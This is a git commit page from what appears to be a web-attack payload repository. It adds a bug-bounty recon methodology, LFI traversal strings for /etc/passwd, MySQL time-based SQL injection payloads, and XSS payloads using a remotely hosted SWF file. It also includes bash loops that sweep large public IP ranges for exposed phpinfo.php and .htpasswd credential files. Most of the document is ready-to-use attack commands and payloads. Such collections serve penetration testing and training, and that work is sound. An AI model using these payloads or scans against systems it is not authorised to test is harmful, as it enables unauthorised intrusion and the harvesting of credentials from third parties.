Methodology added, XSS payloads updated,little fix

Skr1ptKid-0x · Nov 6, 2016 · 54bf6d9 · 54bf6d9
1 parent 22e8dc0
commit 54bf6d9
Show file tree

Hide file tree

Showing 10 changed files with 149 additions and 32 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1 @@
+Low_hanging_fruits.md
diff --git a/Enumeration_and_fingerprinting.md b/Enumeration_and_fingerprinting.md
diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
@@ -0,0 +1,117 @@
+# Methodology and Enumeration
+
+## Bug Hunting Methodology
+1. Enumerate all subdomains (only if the scope is *.domain.ext)
+Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
+```
+git clone https://github.com/guelfoweb/knock
+git clone https://github.com/danielmiessler/SecLists.git
+
+knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
+```
+
+Using Jason Haddix's enumall Recon-ng script, 
+```
+git clone https://[email protected]/LaNMaSteR53/recon-ng.git
+cd recon-ng
+pip install -r REQUIREMENTS
+ln -s /$recon-ng_path /usr/share/recon-ng
+git clone https://github.com/jhaddix/domain.git
+cd domain
+./setup_enumall.sh
+
+./enumall.py domain.com
+-w to run a custom wordlist with recon-ng
+-a to use alt-dns
+-p to feed a custom permutations list to alt-dns (requires -a flag)
+-i to feed a list of domains (can also type extra domains into the original command)
+```
+
+2. Subdomain take over using HostileSubBruteForcer 
+```
+git clone https://github.com/nahamsec/HostileSubBruteforcer
+chmox +x sub_brute.rb
+./sub_brute.rb
+```
+
+3. EyeWitness and Nmap scans from the KnockPy and enumall scans
+```
+git clone https://github.com/ChrisTruncer/EyeWitness.git
+./setup/setup.sh
+./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
+./EyeWitness -f urls.txt --web
+./EyeWitness -x urls.xml -t 8 --headless
+./EyeWitness -f rdp.txt --rdp
+```
+
+4. Basic NMAP (if allowed ^^')
+```
+sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 &
+sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv
+
+• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
+
+• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
+
+• 192.168.0.1 is the IP address to scan
+
+• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
+
+• -T4 defines the timing for the task (options are 0-5 and higher is faster)
+```
+
+5. List all the subdirectories with DirBuster or GoBuster
+```
+./gobuster -u http://buffered.io/ -w words.txt -t 10
+-u url
+-w wordlist
+-t threads
+
+More subdomain :
+./gobuster -m dns -w subdomains.txt -u google.com -i
+```
+
+6. Explore the website
+```
+ - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
+ - Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
+ - Explore and understand available functionality, noting areas that correspond to vulnerability types
+```
+
+7. Look for private information in GitHub repos with GitRob
+```
+gitrob commd
+```
+
+8. Subscribe to the site and pay for the additional functionality to test
+
+9. Launch a Nikto scan in case you missed something
+
+
+## Google Dorks
+
+Google Dork to find subdomains
+```
+site:*.domain.com -www
+site:http://domain.com ext:php
+site:http://domain.com filetype:pdf
+```
+
+## Scripts
+Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
+```
+
+Script to detect all .htpasswd files in a range of IPs
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
+```
+
+
+## Thanks to
+* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
diff --git a/PHP include/README.md b/PHP include/README.md
@@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 
 ## Exploit
 
-Basic LFI (null byte and double encoding)
+Basic LFI (null byte, double encoding and other tricks)
 ```
 http://example.com/index.php?page=etc/passwd
 http://example.com/index.php?page=etc/passwd%00
 http://example.com/index.php?page=../../etc/passwd
 http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
 ```
 
 LFI Wrapper rot13 and base64 - php://filter case insensitive

diff --git a/README.md b/README.md
@@ -22,6 +22,7 @@ Last modifications :
 * [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
 * [Nikto](https://cirt.net/nikto2)
 * [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
+* [Wappalyzer](https://wappalyzer.com/download)
 
 # More resources
 Book's list:

diff --git a/SQL injection/README.md b/SQL injection/README.md
@@ -76,6 +76,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 MySQL Time Based
 ```
 +BENCHMARK(40000000,SHA1(1337))+
+'%2Bbenchmark(3200,SHA1(1))%2B'
 ```
 
 
@@ -107,5 +108,21 @@ Polyglot injection (multicontext)
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 
-## Thanks to
-* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
+## Thanks to - Other resources
+* MySQL:
+  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
+  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
+* MSQQL:
+  - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
+  - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+* ORACLE:
+  - [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
+* POSTGRESQL:
+  - [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
+* Others
+  - [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
+  - [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
+  - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
+  - [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
+  - [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
+  - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
diff --git a/XSS injection/README.md b/XSS injection/README.md
@@ -136,9 +136,18 @@ XSS in SVG (short)
 ```
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
 ```
+
+XSS in SWF
+```
+Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
+IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
+IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
+```
+
 more payloads in ./files
 
 
+
 ## XSS with Relative Path Overwrite - IE 8/9 and lower
 
 You need these 3 components

diff --git a/XSS injection/files/SVG Picture XSS.svg → XSS injection/files/SVG_XSS.svg b/XSS injection/files/SVG Picture XSS.svg → XSS injection/files/SVG_XSS.svg
diff --git a/XSS injection/files/SWF_XSS.swf b/XSS injection/files/SWF_XSS.swf
diff --git a/XSS injection/files/XML XSS.xml → XSS injection/files/XML_XSS.xml b/XSS injection/files/XML XSS.xml → XSS injection/files/XML_XSS.xml